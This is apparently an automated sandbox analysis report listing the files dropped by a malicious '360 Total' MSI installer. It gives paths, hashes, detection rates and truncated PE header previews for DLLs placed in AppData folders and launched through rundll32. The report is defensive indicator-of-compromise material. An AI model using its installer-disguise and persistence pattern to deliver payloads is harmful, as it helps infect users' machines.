                                                                Preview:MZ......................@...................................h...........!..L.!This program cannot be run in DOS mode....$........,>5.MPf.MPf.MPf.<Qg.MPf..Qg.MPf.%Tg.MPf.%Sg.MPf.&Ug.MPf-$Qg.MPf.<Ug.MPf.<Ug.MPf+.f.MPf/$Tg.MPf.*Ug.MPf.*Tg.MPf/$Ug.MPf.$Ug.MPf.%Ug.MPf.&Tg.MPf.&Vg.MPf.&Qg.MPf.MQfoLPf.$Yg.MPf.$Pg.MPf.$.f.MPf.M.f.MPf.$Rg.MPfRich.MPf................PE..d...:5.`..........# .....J..........`........................................@............ ..........................................+......`,..,....0...........d......H?...@..........T.......................(....................`...............................text...(I.......J.................. ..`.rdata.......`.......N..............@..@.data....e...P...0...<..............@....pdata...d.......f...l..............@..@.rsrc........0......................@..@.reloc.......@......................@..ByhDm^........P.........................@.........^EbkSBi$)eAX>u5kZ*^3GxY+_By3IAMem4Y^@h^vhh6CfaeU6j.....................................

                                                                C:\Config.Msi\5fd5a2.rbs

                                                                Download File
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:data
                                                                Category:modified
                                                                Size (bytes):1207
                                                                Entropy (8bit):5.671757573805521
                                                                Encrypted:false
                                                                SSDEEP:24:egyI269VE6jIMaI3I4iItRpU/FPPiNiDDhiSrokfXLK:eBO99jhaxt+b8PPiNiDD8Sr2
                                                                MD5:450C8CD21F938D9DE3DDB11B623C0794
                                                                SHA1:BC841061E5B478302A49DB39E9763C86F6016456
                                                                SHA-256:FB59730844CC246398429AD1FF121157B2E48B9F0F03F7FCA5B23C8CB0E56426
                                                                SHA-512:22B3CC2381C43F7FA293C81F547D12579D4706F3EA299A72576CCB121128E47101EF3A7198D03DDAF296810DDF4F12772F1E7208663BAE7A9F4F715857FBB4CE
                                                                Malicious:false
                                                                Preview:...@IXOS.@.....@...X.@.....@.....@.....@.....@.....@......&.{B135729E-0574-44D1-B7A1-6E44550F506B}..360 Total..ad.msi.@.....@.....@.....@........&.{805E70A6-23C0-4688-BBAF-6F995BB72730}.....@.....@.....@.....@.......@.....@.....@.......@......360 Total......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{B48CC27C-9823-4256-8235-834BFD2D0DBB}&.{B135729E-0574-44D1-B7A1-6E44550F506B}.@......&.{4A323D5F-6D73-4C26-8E39-BE8928DA13EB}&.{B135729E-0574-44D1-B7A1-6E44550F506B}.@......&.{ADF9F598-7B84-45C9-B1CA-E80968A538BA}&.{B135729E-0574-44D1-B7A1-6E44550F506B}.@........CreateFolders..Creating folders..Folder: [1]#.7.C:\Users\user\AppData\Roaming\HuMaster LLC\360 Total\.@........InstallFiles..Copying new files&.File: [1], Directory: [9], Size: [6]..).C:\Users\user\AppData\Local\sharepoint\....5.C:\Users\user\AppData\Local\sharepoint\360total.dll....WriteRegistryValues..Writing system registry

                                                                C:\Users\user\AppData\Local\Temp\MSID3EB.tmp

                                                                Download File
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):446944
                                                                Entropy (8bit):6.403916470886214
                                                                Encrypted:false
                                                                SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                                MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                                SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                                SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                                SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                                Joe Sandbox View:
                                                                • Filename: Document_a19_79b555791-28h97348k5477-3219g9.js, Detection: malicious, Browse
                                                                • Filename: avp.msi, Detection: malicious, Browse
                                                                • Filename: Cheater Pro 1.6.0.msi, Detection: malicious, Browse
                                                                • Filename: Cheat Lab 2.7.2.msi, Detection: malicious, Browse
                                                                • Filename: payload.js, Detection: malicious, Browse
                                                                • Filename: payload.js, Detection: malicious, Browse
                                                                • Filename: Doc_m42_81h118103-88o62135w8623-1999q9.js, Detection: malicious, Browse
                                                                • Filename: avp.msi, Detection: malicious, Browse
                                                                • Filename: sharepoint.msi, Detection: malicious, Browse
                                                                Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

                                                                C:\Users\user\AppData\Local\Temp\MSID498.tmp

                                                                Download File
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):446944
                                                                Entropy (8bit):6.403916470886214
                                                                Encrypted:false
                                                                SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                                MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                                SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                                SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                                SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                                Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

                                                                C:\Users\user\AppData\Local\Temp\MSID4B9.tmp

                                                                Download File
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):446944
                                                                Entropy (8bit):6.403916470886214
                                                                Encrypted:false
                                                                SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                                MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                                SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                                SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                                SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                                Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

                                                                C:\Users\user\AppData\Local\Temp\MSID4D9.tmp

                                                                Download File
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):446944
                                                                Entropy (8bit):6.403916470886214
                                                                Encrypted:false
                                                                SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                                MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                                SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                                SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                                SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                                Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

                                                                C:\Users\user\AppData\Local\Temp\MSID509.tmp

                                                                Download File
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):446944
                                                                Entropy (8bit):6.403916470886214
                                                                Encrypted:false
                                                                SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                                MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                                SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                                SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                                SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                                Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

                                                                C:\Users\user\AppData\Local\Temp\MSID529.tmp

                                                                Download File
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):446944
                                                                Entropy (8bit):6.403916470886214
                                                                Encrypted:false
                                                                SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                                MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                                SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                                SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                                SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                                Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

                                                                C:\Users\user\AppData\Local\sharepoint\360total.dll

                                                                Download File
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):906752
                                                                Entropy (8bit):6.2833336520446625
                                                                Encrypted:false
                                                                SSDEEP:12288:gfPSAAUHV4fZUv/TrguVTax7hNRu18VA8JFoxMk/wYeDKDMyAmp:qPSAAUHV4fZUvfgmaxpu1F8J6xMYHMBS
                                                                MD5:74143402C40AC2E61E9F040A2D7E2D00
                                                                SHA1:4053DC85BB86C47C63F96681D6A62C21CD6342A3
                                                                SHA-256:1625AC230AA5CA950573F3BA0B1A7BD4C7FBD3E3686F9ECD4A40F1504BF33A11
                                                                SHA-512:4AA55B859F15BE8B14C4A0FF6F3971F49B47C1C8C8427F179EB4AB0C76E321441ADFD173469FACB12AAE1E81E25F1328FD621214B42E66F690BA4E9EE1E54CF9
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 5%
                                                                • Antivirus: Virustotal, Detection: 14%, Browse
                                                                Preview:MZ......................@...................................h...........!..L.!This program cannot be run in DOS mode....$........,>5.MPf.MPf.MPf.<Qg.MPf..Qg.MPf.%Tg.MPf.%Sg.MPf.&Ug.MPf-$Qg.MPf.<Ug.MPf.<Ug.MPf+.f.MPf/$Tg.MPf.*Ug.MPf.*Tg.MPf/$Ug.MPf.$Ug.MPf.%Ug.MPf.&Tg.MPf.&Vg.MPf.&Qg.MPf.MQfoLPf.$Yg.MPf.$Pg.MPf.$.f.MPf.M.f.MPf.$Rg.MPfRich.MPf................PE..d...:5.`..........# .....J..........`........................................@............ ..........................................+......`,..,....0...........d......H?...@..........T.......................(....................`...............................text...(I.......J.................. ..`.rdata.......`.......N..............@..@.data....e...P...0...<..............@....pdata...d.......f...l..............@..@.rsrc........0......................@..@.reloc.......@......................@..ByhDm^........P.........................@.........^EbkSBi$)eAX>u5kZ*^3GxY+_By3IAMem4Y^@h^vhh6CfaeU6j.....................................

                                                                C:\Users\user\AppData\Roaming\Custom_update\Update_77697333.dll

                                                                Download File
                                                                Process:C:\Windows\System32\rundll32.exe
                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):906752
                                                                Entropy (8bit):6.2833336520446625
                                                                Encrypted:false
                                                                SSDEEP:12288:gfPSAAUHV4fZUv/TrguVTax7hNRu18VA8JFoxMk/wYeDKDMyAmp:qPSAAUHV4fZUvfgmaxpu1F8J6xMYHMBS
                                                                MD5:74143402C40AC2E61E9F040A2D7E2D00
                                                                SHA1:4053DC85BB86C47C63F96681D6A62C21CD6342A3
                                                                SHA-256:1625AC230AA5CA950573F3BA0B1A7BD4C7FBD3E3686F9ECD4A40F1504BF33A11
                                                                SHA-512:4AA55B859F15BE8B14C4A0FF6F3971F49B47C1C8C8427F179EB4AB0C76E321441ADFD173469FACB12AAE1E81E25F1328FD621214B42E66F690BA4E9EE1E54CF9
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 5%
                                                                • Antivirus: Virustotal, Detection: 14%, Browse
                                                                Preview:MZ......................@...................................h...........!..L.!This program cannot be run in DOS mode....$........,>5.MPf.MPf.MPf.<Qg.MPf..Qg.MPf.%Tg.MPf.%Sg.MPf.&Ug.MPf-$Qg.MPf.<Ug.MPf.<Ug.MPf+.f.MPf/$Tg.MPf.*Ug.MPf.*Tg.MPf/$Ug.MPf.$Ug.MPf.%Ug.MPf.&Tg.MPf.&Vg.MPf.&Qg.MPf.MQfoLPf.$Yg.MPf.$Pg.MPf.$.f.MPf.M.f.MPf.$Rg.MPfRich.MPf................PE..d...:5.`..........# .....J..........`........................................@............ ..........................................+......`,..,....0...........d......H?...@..........T.......................(....................`...............................text...(I.......J.................. ..`.rdata.......`.......N..............@..@.data....e...P...0...<..............@....pdata...d.......f...l..............@..@.rsrc........0......................@..@.reloc.......@......................@..ByhDm^........P.........................@.........^EbkSBi$)eAX>u5kZ*^3GxY+_By3IAMem4Y^@h^vhh6CfaeU6j.....................................

                                                                C:\Users\user\AppData\Roaming\Custom_update\update_data.dat

                                                                Download File
                                                                Process:C:\Windows\System32\rundll32.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):74
                                                                Entropy (8bit):6.020264176439766
                                                                Encrypted:false
                                                                SSDEEP:3:oZ6u8EU9kWVn5pr28xp4ikc4S3:oCk2lxD4S
                                                                MD5:EE5D98CD3EF7D73FA9C2C0AC138AF0CB
                                                                SHA1:AAFC749A19F0EF684631ECB581D73DC2F8368230
                                                                SHA-256:873F91B643A5AA49D0E1B73FE00F2E695910E55BED995D79BC19BF8A6C7ECF63
                                                                SHA-512:3090DFDE9B13B1FED9FA90E193E81D83B962A5F48EB96470DF57A0FBCE6E16D8008789557D1A6E0EA9E385CCDBFD5760FEE97D1227EA89E2612BFC082AC010AC
                                                                Malicious:false
                                                                Preview:P.....K...4..Y!.:.A.]..0..3Z.z.ykr.........<.......R.~c...r-|w.q.1.0>..Y

                                                                C:\Windows\Installer\5fd5a1.msi

                                                                Download File
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {805E70A6-23C0-4688-BBAF-6F995BB72730}, Number of Words: 10, Subject: 360 Total, Author: HuMaster LLC, Name of Creating Application: 360 Total, Template: ;1033, Comments: This installer database contains the logic and data required to install 360 Total., Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
                                                                Category:dropped
                                                                Size (bytes):1619456
                                                                Entropy (8bit):7.152500797895932
                                                                Encrypted:false
                                                                SSDEEP:49152:QZH3YuW8zBQSc0ZnSKmZKumZr7A2BQTBG:+Y90Zn0K/A2OF
                                                                MD5:666151C11B7899A0C764ABE711D3F9B3
                                                                SHA1:35462114E096F4D307607D713136BFE38479870D
                                                                SHA-256:8041A15E27C785F2ADCCE9E8C643F5CC619B52E50CD36FF043D13C4089CE1CAD
                                                                SHA-512:835FEE905D540F1E3B4D32A0645041C9ADD6EA488675A8CA99DBE571CFAAEF5781BED8C1277DD7942BE7D672945D68A1016C2AB5CB645D539E07893D69672ADC
                                                                Malicious:false
                                                                Preview:......................>.......................................................E.......a...............................(...)...*...+...,...-...........A...B...C...D...E...F...............................................................................................................................................................................................................................................................................................................................................................;...........!...3............................................................................................... ...+..."...#...$...%...&...'...(...)...*...1...,...-......./...0...4...2...:...?...5...6...7...8...9...>...<.......=...........@...A...B...C...D...........G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                                                                C:\Windows\Installer\MSID69B.tmp

                                                                Download File
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):446944
                                                                Entropy (8bit):6.403916470886214
                                                                Encrypted:false
                                                                SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                                MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                                SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                                SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                                SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                                Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

                                                                C:\Windows\Installer\MSID719.tmp

                                                                Download File
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):446944
                                                                Entropy (8bit):6.403916470886214
                                                                Encrypted:false
                                                                SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                                MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                                SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                                SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                                SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                                Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

                                                                C:\Windows\Installer\MSID824.tmp

                                                                Download File
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):401017
                                                                Entropy (8bit):6.591625418894829
                                                                Encrypted:false
                                                                SSDEEP:6144:RMvZx0Flyv/UB8zBQSnuJnO6n4ZSaHwLvFnNLqrFWeyp1uBxfAOT3VDqO1p:RMvZx0FlS68zBQSncb4ZPQTpAjZxqO1p
                                                                MD5:8A1FD55346F6FA2061C1D401D9E9584E
                                                                SHA1:FDDB921F0E8BF8B522D9679AAB7F22AC1266642C
                                                                SHA-256:AD5FEF26009019FD8039F7FCCEEBBD6F52481C934DE8256F245A701A553FF304
                                                                SHA-512:5FA4B38B0AF4B65C6E767EE3FE55BA431C3EBB43208119A6A81A9E47C0A3F73E81702527373345EAE40CC49292B4126D9F161A49CD2C108E7949918D4F97A725
                                                                Malicious:false
                                                                Preview:...@IXOS.@.....@...X.@.....@.....@.....@.....@.....@......&.{B135729E-0574-44D1-B7A1-6E44550F506B}..360 Total..ad.msi.@.....@.....@.....@........&.{805E70A6-23C0-4688-BBAF-6F995BB72730}.....@.....@.....@.....@.......@.....@.....@.......@......360 Total......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration...@.....@.....@.]....&.{B48CC27C-9823-4256-8235-834BFD2D0DBB}7.C:\Users\user\AppData\Roaming\HuMaster LLC\360 Total\.@.......@.....@.....@......&.{4A323D5F-6D73-4C26-8E39-BE8928DA13EB}+.01:\Software\HuMaster LLC\360 Total\Version.@.......@.....@.....@......&.{ADF9F598-7B84-45C9-B1CA-E80968A538BA}5.C:\Users\user\AppData\Local\sharepoint\360total.dll.@.......@.....@.....@........CreateFolders..Creating folders..Folder: [1]".7.C:\Users\user\AppData\Roaming\HuMaster LLC\360 Total\.@........InstallFiles..Copying new files&.File: [1], Directory: [9], Size: [6]...@.....@.....@....

                                                                C:\Windows\Installer\MSID8B1.tmp

                                                                Download File
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):399328
                                                                Entropy (8bit):6.589290025452677
                                                                Encrypted:false
                                                                SSDEEP:6144:gMvZx0Flyv/UB8zBQSnuJnO6n4ZSaHwLvFnNLqrFWeyp1uBxfAOT3VDqO1:gMvZx0FlS68zBQSncb4ZPQTpAjZxqO1
                                                                MD5:B9545ED17695A32FACE8C3408A6A3553
                                                                SHA1:F6C31C9CD832AE2AEBCD88E7B2FA6803AE93FC83
                                                                SHA-256:1E0E63B446EECF6C9781C7D1CAE1F46A3BB31654A70612F71F31538FB4F4729A
                                                                SHA-512:F6D6DC40DCBA5FF091452D7CC257427DCB7CE2A21816B4FEC2EE249E63246B64667F5C4095220623533243103876433EF8C12C9B612C0E95FDFFFE41D1504E04
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................J......J..5.......................J......J......J..........Y..."......".q............."......Rich....................PE..L....<.a.........."......^...........2.......p....@..........................P......".....@.................................0....................................5...V..p....................X.......W..@............p.. ............................text....\.......^.................. ..`.rdata..XA...p...B...b..............@..@.data....6..........................@....rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................

                                                                C:\Windows\Installer\SourceHash{B135729E-0574-44D1-B7A1-6E44550F506B}

                                                                Download File
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                Category:dropped
                                                                Size (bytes):20480
                                                                Entropy (8bit):1.1615070252691617
                                                                Encrypted:false
                                                                SSDEEP:12:JSbX72FjciAGiLIlHVRpBh/7777777777777777777777777vDHFXIOQa704pOlN:J9QI5V1IidF
                                                                MD5:E7794FC0A6BBBE717940A0216B663179
                                                                SHA1:39D30989BA6DD902F9A0E479ACF268F337CA7DFE
                                                                SHA-256:1BEA89CC9A8D6E919463633236A3BBB953C7225645F855D77320BD9307CB6658
                                                                SHA-512:0CFEAF61D263BD06C4691C41988B60FB0804A450F926622D1E89C759B4E4D0AA5C874FCC3C0BBC7F5BEE0A7952503C530B66D37315E970A17ADC7483FE2FFBE5
                                                                Malicious:false
                                                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                C:\Windows\Installer\inprogressinstallinfo.ipi

                                                                Download File
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                Category:dropped
                                                                Size (bytes):20480
                                                                Entropy (8bit):1.5808291684127274
                                                                Encrypted:false
                                                                SSDEEP:48:y8Ph4uRc06WXOGjT54b7SaVAErCycD27SGTR:dh41IjTub7JewCS3
                                                                MD5:52FED0FB187091045C487FB8DFD94B4E
                                                                SHA1:F31BA1FC0E04140F359F8F4521F61D2F14240D49
                                                                SHA-256:BAF14058494B03F9C94972B99A7C0E9FF375991BAFEF8C74B1847304278DEADD
                                                                SHA-512:AD6D42A2FD9049C2E5D96205A61B0F5BD7486074774A9123594842CB176406592B8F968FC4D789741C1BD18002E23BE8618285B1CE32E08D2C01786562A32B4B
                                                                Malicious:false
                                                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log

                                                                Download File
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):364484
                                                                Entropy (8bit):5.365507176161241
                                                                Encrypted:false
                                                                SSDEEP:1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26Kgau7:zTtbmkExhMJCIpE8
                                                                MD5:280CA73046808255E54B977BFBF51E30
                                                                SHA1:24D156D2BBC408B970F48FB01B0F2135863862BC
                                                                SHA-256:BD962A71280FB8EEAE09F17ED877E08F7F48001CE760729B8B714D325395CB48
